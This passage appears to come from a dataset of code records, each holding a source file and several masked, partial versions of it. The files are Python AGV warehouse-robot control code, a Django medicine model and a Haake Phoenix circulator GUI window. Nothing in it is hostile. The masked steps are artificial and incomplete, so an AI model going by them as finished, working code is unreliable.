'591'\n assert gg['CART9002'] == '592'\n checkCart('CART9002', '592')\n checkCart('CART9001', '591')\n try:\n checkCart('CART9002', '591')\n assert 0\n except Exception as e:\n s = str(e)\n assert s.find('货架ID不正确,期望货架:CART9002, 实际货架:CART9001') != -1\n\n\n<mask token>\n\n\[email protected]\ndef move_cart(cartId, srcLoc, destLoc, agvId=None):\n print(cartId, srcLoc, destLoc)\n counter.setPrint(True)\n\n def callback1(obj):\n if obj['result'] == -1:\n print('error, system exit')\n obj['finish'] = True\n sys.exit(-1)\n else:\n log.warning(obj['agv'], 'start move from', obj['loc1'], 'to',\n obj['loc2'])\n moveCart(obj['agv'], obj['cart'], obj['loc1'], obj['loc2'],\n callback2, obj)\n\n def callback2(obj):\n if obj['result'] == -1:\n print('error, system exit')\n obj['finish'] = True\n sys.exit(-1)\n else:\n log.warning(obj['agv'], 'arrived', obj['loc2'])\n obj['finish'] = True\n obj = {}\n obj['loc1'] = srcLoc\n obj['loc2'] = destLoc\n obj['cart'] = cartId\n print('call ', srcLoc)\n if agvId is None:\n agvId = apply(srcLoc)\n call(agvId, srcLoc, callback1, obj)\n while not utility.is_exited():\n if 'finish' in obj:\n break\n time.sleep(0.2)\n print('------ move ', srcLoc, ' to ', destLoc, ' finish ------')\n\n\ndef func2(stock1, stock2):\n print('-------------------- start thread ------------------------',\n stock1, stock2)\n time.sleep(1)\n cartId = 'CART9009'\n for i in range(20):\n print('current loop is - ', i.__str__())\n move_cart(cartId, stock1, stock2)\n move_cart(cartId, stock2, stock1)\n print('current loop end - ', i.__str__())\n print('=======================================')\n print('finish func2')\n print('=======================================')\n\n\ndef func3(times, starts, seats):\n current = starts\n cartId = 'CART9009'\n time.sleep(1)\n for loop in range(0, times - 1):\n tip1 = 'currentLoop is ' + loop.__str__(\n ) + ' currentStart is ' + current\n print(tip1)\n for i in range(0, len(seats)):\n next = str(seats[i])\n tip2 = ('currentLoop is ' + loop.__str__() +\n 'currentOrigin is ' + current + 'currentNext is ' + next +\n ' seatIndex is ' + i.__str__())\n print(tip2)\n print('excuting')\n move_cart(cartId, current, next)\n current = next\n\n\ndef testPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n seat = currentJson['seat']\n loop = int(currentJson['loop'])\n seats = str.split(seat, ',')\n durabilityTestTask1 = threading.Thread(target=func3, args=[loop,\n start, seats])\n durabilityTestTask1.start()\n result = True\n return result\n\n\ndef testtestPageAgvControl(jsonstr):\n jsonData = json.loads(jsonstr)\n result = False\n if len(jsonData) == 0:\n result = False\n else:\n for currentJson in jsonData:\n start = currentJson['start']\n print(start)\n time.sleep(3)\n seat = currentJson['seat']\n seats = str.split(seat, ',')\n print(seat)\n time.sleep(3)\n for currentseat in seats:\n print(currentseat)\n time.sleep(3)\n time.sleep(10)\n result = True\n return result\n\n\ndef testPageUnloockAll():\n api.unlockAll()\n\n\ndef testProcess(jsonData):\n utility.start()\n testPageAgvControl(jsonData)\n utility.finish()\n\n\ndef test1():\n Init()\n durabilityTestTask1 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col3', ['stockA_row1_col2', 'stockA_row1_col4']])\n durabilityTestTask1.start()\n durabilityTestTask2 = threading.Thread(target=func3, args=[20,\n 'stockA_row1_col2', ['seat2_1', 'stockA_row4_col2']])\n durabilityTestTask3 = threading.Thread(target=func3, args=[20,\n 'stockA_row5_col3', ['seat16_1', 'stockA_row5_col2']])\n durabilityTestTask4 = threading.Thread(target=func3, args=[20,\n 'stockA_row6_col3', ['seat12_1', 'stockA_row6_col2']])\n durabilityTestTask1.join()\n print('===============ALL FINISH ========================')\n\n\n<mask token>\n", "step-5": "#coding=utf-8\n# ycat\t\t\t2017-10-20\t create\n# AGV的控制 \nimport sys,os \nimport json\nimport setup\nif __name__ == '__main__':\n\tsetup.setCurPath(__file__)\nimport utility\nimport enhance\t\nimport threading\nimport time\nimport log\nimport re\nimport lock\nimport json_codec\nimport driver.agv.hdcAgvApi as api\ng_threads =[]\ng_carts = None\ng_point = None\ng_lock = threading.RLock()\nlocationEvent = enhance.event()\napi.locationEvent.connect(locationEvent.emit)\n\[email protected]()\ndef init():\n\tif utility.is_test():\n\t\treturn\n\tapi.init()\n\ttime.sleep(3)\n\ndef wait():\n\tglobal g_threads\n\tfor t in g_threads:\n\t\tt.join()\n\tg_threads.clear()\n\t\[email protected]()\ndef fini():\n\tif utility.is_test():\n\t\treturn\n\tapi.fini()\n\twait()\n\ng_stockLock = {}\n\ndef getStockA(loc):\n\tif loc[0:6] != \"stockA\":\n\t\t\treturn None\n\tm = re.search(\"stockA_row(\\d+)_col(\\d+).*\",loc)\n\tif m is None:\n\t\treturn None\n\trow = int(m.group(1))\n\tcol = int(m.group(2))\n\tif row is None:\n\t\treturn\n\tif row%2 != 1:\n\t\trow -= 1\n\treturn row*1000+col\n\t\[email protected](g_lock)\t\ndef checkTimeout(index,agvId,loc):\n\tglobal g_stockLock\n\tif index in g_stockLock:\n\t\tif utility.ticks() - g_stockLock[index] > 10*60*1000:\n\t\t\tunlockStockA(agvId,loc)\n\t\t\tlog.warning(\"delete timeout locked\",index)\n\t\t\t\n\t\n#解决在StockA两个车头对撞的问题 \ndef lockStockA(agvId,loc):\n\tglobal g_stockLock\n\tindex = getStockA(loc)\n\tif index is None:\n\t\treturn\n\tif index in g_stockLock:\n\t\tcheckTimeout(index,agvId,loc)\n\t\tlog.warning(agvId,loc,\"is locked, wait for unlock\")\n\t\tfor i in range(60*5):\n\t\t\tif index not in g_stockLock:\n\t\t\t\tbreak\n\t\t\ttime.sleep(1)\n\t\tlog.info(agvId,loc,\"wait for unlock success\")\n\tglobal g_lock\n\tlog.debug(agvId,\"lock\",loc,index)\n\tg_lock.acquire()\n\tg_stockLock[index] = utility.ticks()\n\tg_lock.release()\n\[email protected](g_lock)\t\ndef unlockStockA(agvId,loc):\n\tglobal g_stockLock\n\tindex = getStockA(loc)\n\tif index in g_stockLock:\n\t\tlog.debug(agvId,\"unlock\",loc,index)\n\t\tdel g_stockLock[index]\n\[email protected](g_lock)\ndef getPoint(originPoint):\n\tglobal g_point\n\tloadPoint()\n\tif g_point[originPoint] is not None:\n\t\treturn g_point[originPoint]\n\n\treturn originPoint\n\n\[email protected](g_lock)\ndef getOriginPoint(point):\n\tglobal g_point\n\tloadPoint()\n\tfor itemIndex in g_point:\n\t\tif g_point[itemIndex] == point:\n\t\t\treturn itemIndex\n\treturn point\n\[email protected](g_lock)\ndef loadPoint():\n\tglobal g_point\n\tfilePath = os.path.dirname(__file__)\n\tfileName = \"point.cfg\"\n\tif filePath:\n\t\tfileName = filePath + \"/\" + fileName\n\tg_point = json_codec.load_file(fileName)\n\n\[email protected](g_lock)\t\ndef checkCart(cartId,scanId):\n\tscanId = scanId.strip()\n\tdef loadCart():\n\t\tglobal g_carts\n\t\tp = os.path.dirname(__file__)\n\t\tpp = \"cart.cfg\"\n\t\tif p:\n\t\t\tpp = p+\"/\"+pp \n\t\tg_carts = json_codec.load_file(pp)\n\t\t\n\tdef saveCart():\n\t\tglobal g_carts\n\t\tp = os.path.dirname(__file__)\n\t\tpp = \"cart.cfg\"\n\t\tif p:\n\t\t\tpp = p+\"/\"+pp \n\t\tjson_codec.dump_file(pp,g_carts)\n\t\t\n\tdef findCart(scanId):\n\t\tglobal g_carts\n\t\tfor c in g_carts:\n\t\t\tif g_carts[c] == scanId:\n\t\t\t\treturn c\n\t\treturn \"unknown\"\n\t\t\n\tglobal g_carts\n\tif g_carts is None:\n\t\tloadCart()\n\tif cartId in g_carts:\n\t\tif scanId != g_carts[cartId]:\n\t\t\tlog.error(\"货架ID不正确,期望货架:\"+cartId+\", 实际货架:\"+findCart(scanId))\n\t\t\traise Exception(\"货架ID不正确,期望货架:\"+cartId+\", 实际货架:\"+findCart(scanId))\n\telse:\n\t\tg_carts[cartId] = scanId\n\t\tsaveCart()\n\t\n#finishCallback参数: finishCallback(obj)\n#obj会自动带上下面三个参数 \n#obj[\"agv\"] = agvId\n#obj[\"result\"] = 0\n#obj[\"resultDesc\"] = \"success\"\n\t\ndef _run(func,args,callback,obj):\n\tdef threadFunc(func,args,callback,obj):\n\t\thasCallback = False\n\t\ttry:\n\t\t\tfunc(*args)\n\t\t\tif utility.is_exited():\n\t\t\t\treturn\n\t\t\thasCallback = True\n\t\t\tcallback(obj)\n\t\texcept Exception as e:\n\t\t\tobj[\"result\"] = -1\n\t\t\tobj[\"resultDesc\"] = str(e)\n\t\t\tlog.exception(\"agvCtrl:\",e)\n\t\t\tif \"agv\" in obj:\n\t\t\t\tagvId= obj[\"agv\"]\n\t\t\t\tlog.debug(\"小车:\"+agvId+\",出现未经处理的异常,正在返航 \")\n\t\t\t\trestAgv(agvId)\n\t\t\t\tfreeAgv(agvId)\n\t\t\tif not hasCallback:\n\t\t\t\tcallback(obj)\n\tt = threading.Thread(target=threadFunc,args=(func,args,callback,obj))\n\tglobal g_threads\n\tt.start()\n\tg_threads.append(t)\n\t\ndef _initObj(obj,agvId):\n\tobj[\"agv\"] = agvId\n\tobj[\"result\"] = 0\n\tobj[\"resultDesc\"] = \"success\"\n\t\ndef _call(agvId,locId):\n\tif api.isCartLoc(locId):\n\t\tapi.move(agvId,locId+\".1\")\n\t\tlockStockA(agvId,locId)\n\t\ttry:\n\t\t\tapi.mission(agvId,1) #旋转——》钻入货架——》扫码——》返回货架id号码 \n\t\texcept Exception as e:\n\t\t\tunlockStockA(agvId,locId)\n\t\t\traise e\n\telse:\n\t\tapi.move(agvId,locId)\n\ndef apply(locId):\n\tlocId=getOriginPoint(locId)\n\n\treturn api.apply(locId+'.1')\n\t\ndef call(agvId,locId,finishCallback,obj):\n\t_initObj(obj,agvId)\n\tlocId=getOriginPoint(locId)\n\ttry:\n\n\t\t_run(func=_call,args=(agvId,locId),callback=finishCallback,obj=obj)\n\texcept Exception as e:\n\t\trestAgv(agvId)\n\t\tfreeAgv(agvId)\n\t\traise e\n\treturn agvId\n\t \ndef _moveCart(agvId,srcLoc,locId,cartId):\n\ttry:\n\t\tc = api.mission(agvId,2) #顶升任务,这个也会返回货架ID \n\t\tif c:\n\t\t\tcheckCart(cartId,c)\n\t\tapi.move(agvId,srcLoc+\".2\") \n\texcept Exception as e:\n\t\t#TODO:ycat api.move(agvId,srcLoc+\".2\")\n\t\t#TODO:ycat raise e\n\t\tpass\n\tfinally:\n\t\tunlockStockA(agvId,srcLoc)\n\t\n\tloc,type = api.getMissionType(\"get\",\"\",srcLoc)\n\tapi.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动\n\t\n\tloc,type = api.getMissionType(\"put\",srcLoc,locId)\n\tapi.move(agvId,loc+\".3\")\n\tapi.mission(agvId,type) #3随动使小车和货架向右随动,4随动使小车和货架向左随动\n\tlockStockA(agvId,locId)\n\ttry:\n\t\tapi.move(agvId,locId+\".4\")\n\t\tapi.mission(agvId,5) #放下货架 \n\t\tapi.move(agvId,locId+\".5\") #返航 \n\tfinally:\n\t\tunlockStockA(agvId,locId)\n\tfreeAgv(agvId)\n\t \n#带货架运输 \ndef moveCart(agvId,cartId,srcLoc,locId,finishCallback,obj):\t \n\t_initObj(obj,agvId)\n\tassert api.isCartLoc(cartId)\n\t#移动货架前,一定是locked状态 \n\t#assert api.isLocked(agvId)\n\tsrcLoc = getOriginPoint(srcLoc)\n\tlocId = getOriginPoint(locId)\n\ttry:\n\t\t_run(func=_moveCart,args=(agvId,srcLoc,locId,cartId),callback=finishCallback,obj=obj) \n\texcept Exception as e:\n\t\trestAgv(agvId)\n\t\tfreeAgv(agvId)\n\t\traise e\n\t\t\t \n\t\t\t\n#不带货架运输 \ndef move(agvId,locId,finishCallback,obj):\n\t_initObj(obj,agvId)\t\t\n\t#移动前,一定是locked状态 \n\t#assert api.isLocked(agvId)\n\ttry:\n\t\tlocId=getOriginPoint(locId)\n\t\t_run(func=api.move,args=(agvId,locId),callback=finishCallback,obj=obj) \n\texcept Exception as e:\n\t\tfreeAgv(agvId)\n\t\traise e\n\t\n#释放对agv的占用 \ndef freeAgv(agvId): \n\ttry:\n\t\tapi.unlock(agvId)\n\texcept Exception as e:\n\t\tlog.exception(\"freeAgv\",e)\n\t\n#回归转盘\ndef restAgv(agvId):\n\tagvId2 = api.getAgvId(agvId)\n\tapi.reset(agvId2)\n\n\ndef Init():\n\timport interface.dashboard.dashboardApi\n\tlocationEvent.connect(interface.dashboard.dashboardApi.reportAgvLoc)\n\ttime.sleep(3)\n################# unit test ################# \ndef testgetPoint():\n\tresulta= getPoint(\"StockA_row7_col4\")\n\tassert resulta== \"begin_1\"\n\tresultb= getPoint(\"StockA_row8_col4\")\n\tassert resultb == \"begin_2\"\n\n\ndef testgetOrginPoint():\n\tresulta= getOriginPoint(\"begin_1\")\n\tassert resulta== \"StockA_row7_col4\"\n\tresultb= getOriginPoint(\"begin_2\")\n\tassert \tresultb == \"StockA_row8_col4\"\n\tresultc = getOriginPoint(\"hhahahaa\")\n\n\tassert resultc == \"hhahahaa\"\n\n\ndef testgetStockA():\n\tassert getStockA(\"stockA_row10_col3\") == 9003\n\tassert getStockA(\"stockA_row10_col4\") == 9004\n\tassert getStockA(\"stockA_row1_col1\") == 1001\n\tassert getStockA(\"stockA_row2_col2\") == 1002\n\tassert getStockA(\"stockA_row3_col2\") == 3002\n\tassert getStockA(\"stockA_row4_col2\") == 3002\n\tassert getStockA(\"stockA_row4_col2.1\") == 3002\n\tassert getStockA(\"stockB_row4_col2.1\") == None\n\tassert getStockA(\"begin_1\") == None\n\tassert getStockA(\"seat_1\") == None\n\ndef testcheckCart():\n\tglobal g_carts\n\tg_carts = None\n\tcheckCart(\"CART9001\",\"591\")\n\tcheckCart(\"CART9002\",\"592\")\n\tgg = json_codec.load_file(\"cart.cfg\")\n\tassert \"CART9001\" in gg\n\tassert \"CART9002\" in gg\n\tassert gg[\"CART9001\"] == \"591\"\n\tassert gg[\"CART9002\"] == \"592\"\n\tcheckCart(\"CART9002\",\"592\")\n\tcheckCart(\"CART9001\",\"591\")\n\ttry:\n\t\tcheckCart(\"CART9002\",\"591\")\n\t\tassert 0\n\texcept Exception as e:\n\t\ts = str(e)\n\t\tassert s.find(\"货架ID不正确,期望货架:CART9002, 实际货架:CART9001\") != -1\n\t\t\nimport counter\[email protected]\ndef move_cart(cartId,srcLoc,destLoc,agvId=None):\n\tprint(cartId,srcLoc,destLoc)\n\tcounter.setPrint(True)\n\tdef callback1(obj):\n\t\tif obj[\"result\"] == -1: \n\t\t\tprint(\"error, system exit\")\n\t\t\tobj[\"finish\"] = True\n\t\t\tsys.exit(-1) \n\t\telse:\n\t\t\tlog.warning(obj[\"agv\"],\"start move from\",obj[\"loc1\"],\"to\",obj[\"loc2\"]) \n\t\t\tmoveCart(obj[\"agv\"],obj[\"cart\"],obj[\"loc1\"],obj[\"loc2\"],callback2,obj)\n\t\n\tdef callback2(obj):\n\t\tif obj[\"result\"] == -1: \n\t\t\tprint(\"error, system exit\")\n\t\t\tobj[\"finish\"] = True\n\t\t\tsys.exit(-1) \n\t\telse:\n\t\t\tlog.warning(obj[\"agv\"],\"arrived\",obj[\"loc2\"])\n\t\tobj[\"finish\"] = True\n\t\t\t\n\tobj = {}\n\tobj[\"loc1\"] = srcLoc\n\tobj[\"loc2\"] = destLoc\n\tobj[\"cart\"] = cartId\n\tprint(\"call \",srcLoc)\n\tif agvId is None:\n\t\tagvId = apply(srcLoc)\n\n\tcall(agvId,srcLoc,callback1,obj)\n\twhile not utility.is_exited():\n\t\tif \"finish\" in obj:\n\t\t\tbreak\n\t\ttime.sleep(0.2)\n\tprint(\"------ move \",srcLoc,\" to \",destLoc,\" finish ------\")\n\t\n\t\n#def func1(start,stock1,stock2):\n#\tprint(\"-------------------- start thread ------------------------\")\n#\ttime.sleep(1) \n#\tcartId = \"CART9009\"\n#\tmove_cart(cartId,start,stock1)\n#\tnext = stock1\n#\tfor s in seats:\n#\t\tmove_cart(cartId,next,\"seat\"+str(s)+\"_1\")\n#\t\tif next == stock1:\n#\t\t\tnext = stock2\n#\t\telse:\n#\t\t\tnext = stock1\n#\t\tmove_cart(cartId,\"seat\"+str(s)+\"_1\",next)\n#\t\t# move_cart(cartId, s, next)\n#\tprint(\"=======================================\")\n#\tprint(\"finish func1\")\n#\tprint(\"=======================================\")\n\ndef func2(stock1,stock2):\n\tprint(\"-------------------- start thread ------------------------\",stock1,stock2)\n\ttime.sleep(1) \n\tcartId = \"CART9009\"\n\tfor i in range(20):\n\t\tprint(\"current loop is - \",i.__str__())\n\t\tmove_cart(cartId,stock1,stock2)\n\t\tmove_cart(cartId,stock2,stock1) \n\t\tprint(\"current loop end - \",i.__str__())\n\tprint(\"=======================================\")\n\tprint(\"finish func2\")\n\tprint(\"=======================================\")\t\n\ndef func3(times,starts,seats):\n\tcurrent=starts\n\tcartId = \"CART9009\"\n\ttime.sleep(1)\n\tfor loop in range(0,times-1):\n\t\t# current=starts\n\t\ttip1=\"currentLoop is \"+loop.__str__()+\" currentStart is \"+current\n\t\tprint(tip1)\n\t\tfor i in range(0,len(seats)):\n\t\t\tnext = str(seats[i])\n\t\t\ttip2= \"currentLoop is \"+loop.__str__()+\"currentOrigin is \"+ current\t+ \"currentNext is \" + next +\" seatIndex is \"+i.__str__()\n\t\t\tprint(tip2)\n\t\t\tprint(\"excuting\")\n\t\t\tmove_cart(cartId,current,next)\n\t\t\tcurrent = next\ndef testPageAgvControl(jsonstr):\n\tjsonData = json.loads(jsonstr)\n\tresult = False\n\tif len(jsonData)==0:\n\t\tresult=False\n\telse:\n\t\tfor currentJson in jsonData:\n\t\t\tstart = currentJson[\"start\"]\n\t\t\tseat = currentJson[\"seat\"]\n\t\t\tloop=int(currentJson[\"loop\"])\n\t\t\tseats = str.split(seat, ',')\n\t\t\tdurabilityTestTask1 = threading.Thread(target=func3, args=[loop, start, seats])\n\t\t\tdurabilityTestTask1.start()\n\t\tresult=True\n\n\treturn result\n\ndef testtestPageAgvControl(jsonstr):\n\tjsonData = json.loads(jsonstr)\n\tresult = False\n\tif len(jsonData) == 0:\n\t\tresult = False\n\telse:\n\t\tfor currentJson in jsonData:\n\t\t\tstart = currentJson[\"start\"]\n\t\t\tprint(start)\n\t\t\ttime.sleep(3)\n\t\t\tseat = currentJson[\"seat\"]\n\t\t\tseats = str.split(seat, ',')\n\t\t\tprint(seat)\n\t\t\ttime.sleep(3)\n\t\t\tfor\tcurrentseat in seats:\n\t\t\t\tprint(currentseat)\n\t\t\t\ttime.sleep(3)\n\t\t\ttime.sleep(10)\n\t\tresult = True\n\n\treturn result\n\ndef testPageUnloockAll():\n\tapi.unlockAll();\n\ndef testProcess(jsonData):\n\tutility.start()\n\ttestPageAgvControl(jsonData)\n\tutility.finish()\n\n\n\ndef test1():\n\tInit()\n\t\n\tdurabilityTestTask1= threading.Thread(target=func3,args=[20,\"stockA_row1_col3\",[\"stockA_row1_col2\",\"stockA_row1_col4\"]])\n\tdurabilityTestTask1.start()\n\n\tdurabilityTestTask2= threading.Thread(target=func3,args=[20,\"stockA_row1_col2\",[\"seat2_1\",\"stockA_row4_col2\"]])\n\t# durabilityTestTask2.start()\n\n\tdurabilityTestTask3= threading.Thread(target=func3,args=[20,\"stockA_row5_col3\",[\"seat16_1\",\"stockA_row5_col2\"]])\n\t# durabilityTestTask3.start()\n\n\tdurabilityTestTask4= threading.Thread(target=func3,args=[20,\"stockA_row6_col3\",[\"seat12_1\",\"stockA_row6_col2\"]])\n\t# durabilityTestTask4.start()\n\n\tdurabilityTestTask1.join()\n\n\t\n\t#t1.join()\t\n\tprint(\"===============ALL FINISH ========================\")\n\n\n\n\nif __name__ == '__main__':\n\t# utility.run_tests()\n\tif sys.argv is not None and len(sys.argv)>0:\n\t\tif \"process\" in sys.argv:\n\t\t\tlog.info(\"run at testPage mode\")\n\t\t\targs=\"\"\n\t\t\twith open('/agvscada/driver/args.txt', 'r', encoding='utf-8') as f:\n\t\t\t\targs=f.read()\n\t\t\tapi.init()\n\t\t\ttime.sleep(3)\n\t\t\ttestPageAgvControl(args)\n\t\telif \"unlock\" in sys.argv:\n\t\t\ttestPageUnloockAll()\n\t\telif \"test\" in sys.argv:\n\t\t\tutility.start()\n\t\t\ttest1()\n\t\t\tutility.finish()\n\n\n\n\telse:\n\t\tutility.start()\n\t\ttestgetPoint()\n\t\tutility.finish()\n\t# test3()\n\t\n\t\n\t\n\t\n", "step-ids": [ 26, 29, 30, 34, 38 ] }
[ 26, 29, 30, 34, 38 ]
from django.db import models # Create your models here. class Remedio(models.Model): nome = models.CharField(max_length=100, unique=True, help_text='Nome') valor = models.FloatField(null=False, help_text='Valor') detalhe = models.CharField(max_length=500, null=True) foto = models.ImageField(upload_to='media') def __str__(self): return self.nome
normal
{ "blob_id": "07cce6802ab3259dbc78ab86a8dd6d6a4a617c7e", "index": 5242, "step-1": "<mask token>\n\n\nclass Remedio(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Remedio(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n", "step-3": "<mask token>\n\n\nclass Remedio(models.Model):\n nome = models.CharField(max_length=100, unique=True, help_text='Nome')\n valor = models.FloatField(null=False, help_text='Valor')\n detalhe = models.CharField(max_length=500, null=True)\n foto = models.ImageField(upload_to='media')\n\n def __str__(self):\n return self.nome\n", "step-4": "from django.db import models\n\n\nclass Remedio(models.Model):\n nome = models.CharField(max_length=100, unique=True, help_text='Nome')\n valor = models.FloatField(null=False, help_text='Valor')\n detalhe = models.CharField(max_length=500, null=True)\n foto = models.ImageField(upload_to='media')\n\n def __str__(self):\n return self.nome\n", "step-5": "from django.db import models\n\n# Create your models here.\nclass Remedio(models.Model):\n nome = models.CharField(max_length=100, unique=True, help_text='Nome')\n valor = models.FloatField(null=False, help_text='Valor')\n detalhe = models.CharField(max_length=500, null=True)\n foto = models.ImageField(upload_to='media')\n\n def __str__(self):\n return self.nome", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
import datetime from ..core.indicator import Indicator, IndicatorState from ..core.toolwindow import ToolWindow class HaakePhoenix(ToolWindow): required_devices = ['haakephoenix'] def __init__(self, *args, **wargs): self.indicators = {} super().__init__(*args, **wargs) def init_gui(self, *args, **kwargs): statusgrid = self.builder.get_object('statusgrid') for row, column, vn, label in [(0, 0, '_status', 'Status'), (0, 1, 'setpoint', 'Target temperature'), (0, 2, 'temperature', 'Temperature'), (0, 3, 'pump_power', 'Pump speed'), (0, 4, 'control_on', 'Temperature control'), (1, 0, 'lowlimit', 'Low limit'), (1, 1, 'highlimit', 'High limit'), (1, 2, 'cooling_on', 'Cooling'), (1, 3, 'control_external', 'Control'), (1, 4, 'diffcontrol_on', 'Differential control')]: self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN) statusgrid.attach(self.indicators[vn], column, row, 1, 1) errorgrid = self.builder.get_object('errorgrid') for row, column, vn, label in [(0, 0, 'external_pt100_error', 'External Pt100'), # (0, 1, 'internal_pt100_error', 'Internal Pt100'), # (0, 2, 'liquid_level_low_error', 'Liquid level'), # (0, 3, 'liquid_level_alarm_error', 'Liquid level alarm'), # (0, 4, 'cooling_error', 'Cooling system'), # (1, 0, 'pump_overload_error', 'Pump'), # (1, 1, 'external_alarm_error', 'External alarm'), # (1, 2, 'overtemperature_error', 'Overtemperature'), # (1, 3, 'main_relay_missing_error', 'Main relay'), # (1, 4, 'faultstatus', 'Status flags')]: # self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN) errorgrid.attach(self.indicators[vn], column, row, 1, 1) othergrid = self.builder.get_object('othergrid') for row, column, vn, label in [(0, 0, 'firmwareversion', 'Firmware version'), # (0, 1, 'date', 'Date'), # (0, 2, 'time', 'Time'), # (0, 3, 'autostart', 'Autostart'), # (0, 4, 'beep', 'Beep'), # (1, 0, 'fuzzyid', 'Fuzzy identification'), # (1, 1, 'fuzzycontrol', 'Fuzzy control'), # (1, 2, 'fuzzystatus', 'Fuzzy status'), # (1, 3, 'watchdog_on', 'Watchdog'), # (1, 4, 'watchdog_setpoint', 'Watchdog setpoint')]: # self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN) othergrid.attach(self.indicators[vn], column, row, 1, 1) self.update_indicators() def on_mainwidget_map(self, window): if super().on_mainwidget_map(window): return True self.update_indicators() def update_indicators(self): dev = self.instrument.get_device('haakephoenix') for vn in self.indicators: self.on_device_variable_change(dev, vn, dev.get_variable(vn)) self.builder.get_object('setpoint_adjustment').set_value( dev.get_variable('setpoint')) self.builder.get_object('lowlimit_adjustment').set_value( dev.get_variable('lowlimit')) self.builder.get_object('highlimit_adjustment').set_value( dev.get_variable('highlimit')) def on_device_variable_change(self, device, variablename, newvalue): if variablename in ['_status', 'firmwareversion', 'fuzzycontrol', 'date', 'time', 'faultstatus']: self.indicators[variablename].set_value(str(newvalue), IndicatorState.NEUTRAL) elif variablename in ['setpoint', 'temperature', 'lowlimit', 'highlimit']: self.indicators[variablename].set_value('%.2f°C' % newvalue, IndicatorState.NEUTRAL) elif variablename in ['control_on', 'cooling_on', 'diffcontrol_on', 'watchdog_on', 'beep', 'fuzzyid', 'fuzzystatus', 'autostart']: self.indicators[variablename].set_value(['OFF', 'ON'][int(bool(newvalue))], [IndicatorState.ERROR, IndicatorState.OK][int(bool(newvalue))]) elif variablename in ['pump_power']: self.indicators[variablename].set_value('%.2f %%' % newvalue, [IndicatorState.ERROR, IndicatorState.OK][newvalue > 0]) elif variablename in ['external_pt100_error', 'internal_pt100_error', 'liquid_level_low_error', 'cooling_error', 'main_relay_missing_error']: self.indicators[variablename].set_value(['OK', 'ERROR'][int(bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))]) elif variablename in ['liquid_level_alarm_error', 'external_alarm_error', 'overtemperature_error']: self.indicators[variablename].set_value(['OK', 'ALARM'][int(bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))]) elif variablename in ['pump_overload_error']: self.indicators[variablename].set_value(['OK', 'OVERLOAD'][int(bool(newvalue))], [IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))]) elif variablename in ['watchdog_setpoint']: self.indicators[variablename].set_value('%.2f sec' % newvalue, IndicatorState.UNKNOWN) elif variablename in ['control_external']: self.indicators[variablename].set_value(['Internal', 'External'][int(bool(newvalue))], IndicatorState.NEUTRAL) if variablename == 'fuzzyid': self.builder.get_object('fuzzyid_switch').set_state(bool(newvalue)) elif variablename == 'pump_power': self.builder.get_object('circulator_switch').set_state(newvalue > 0) return False def on_circulator_switch_state_set(self, switch, state): dev = self.instrument.get_device('haakephoenix') if state: dev.execute_command('start') else: dev.execute_command('stop') return True def on_fuzzyid_switch_state_set(self, switch, state): self.instrument.get_device('haakephoenix').set_variable('fuzzyid', state) return True def on_set_setpoint(self, button): spinbutton = self.builder.get_object('setpoint_spin') self.instrument.get_device('haakephoenix').set_variable('setpoint', spinbutton.get_value()) def on_set_lowlimit(self, button): spinbutton = self.builder.get_object('lowlimit_spin') self.instrument.get_device('haakephoenix').set_variable('lowlimit', spinbutton.get_value()) def on_set_highlimit(self, button): spinbutton = self.builder.get_object('highlimit_spin') self.instrument.get_device('haakephoenix').set_variable('highlimit', spinbutton.get_value()) def on_update_rtc(self, button): now = datetime.datetime.now() self.instrument.get_device('haakephoenix').set_variable('date', now.date()) self.instrument.get_device('haakephoenix').set_variable('time', now.time())
normal
{ "blob_id": "25aa0766505b22588107d44e15c3596e9383d4e9", "index": 486, "step-1": "<mask token>\n\n\nclass HaakePhoenix(ToolWindow):\n <mask token>\n\n def __init__(self, *args, **wargs):\n self.indicators = {}\n super().__init__(*args, **wargs)\n\n def init_gui(self, *args, **kwargs):\n statusgrid = self.builder.get_object('statusgrid')\n for row, column, vn, label in [(0, 0, '_status', 'Status'), (0, 1,\n 'setpoint', 'Target temperature'), (0, 2, 'temperature',\n 'Temperature'), (0, 3, 'pump_power', 'Pump speed'), (0, 4,\n 'control_on', 'Temperature control'), (1, 0, 'lowlimit',\n 'Low limit'), (1, 1, 'highlimit', 'High limit'), (1, 2,\n 'cooling_on', 'Cooling'), (1, 3, 'control_external', 'Control'),\n (1, 4, 'diffcontrol_on', 'Differential control')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n statusgrid.attach(self.indicators[vn], column, row, 1, 1)\n errorgrid = self.builder.get_object('errorgrid')\n for row, column, vn, label in [(0, 0, 'external_pt100_error',\n 'External Pt100'), (0, 1, 'internal_pt100_error',\n 'Internal Pt100'), (0, 2, 'liquid_level_low_error',\n 'Liquid level'), (0, 3, 'liquid_level_alarm_error',\n 'Liquid level alarm'), (0, 4, 'cooling_error', 'Cooling system'\n ), (1, 0, 'pump_overload_error', 'Pump'), (1, 1,\n 'external_alarm_error', 'External alarm'), (1, 2,\n 'overtemperature_error', 'Overtemperature'), (1, 3,\n 'main_relay_missing_error', 'Main relay'), (1, 4, 'faultstatus',\n 'Status flags')]:\n self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN\n )\n errorgrid.attach(self.indicators[vn], column, row, 1, 1)\n othergrid = self.builder.get_object('othergrid')\n for row, column, vn, label in [(0, 0, 'firmwareversion',\n 'Firmware version'), (0, 1, 'date', 'Date'), (0, 2, 'time',\n 'Time'), (0, 3, 'autostart', 'Autostart'), (0, 4, 'beep',\n 'Beep'), (1, 0, 'fuzzyid', 'Fuzzy identification'), (1, 1,\n 'fuzzycontrol', 'Fuzzy control'), 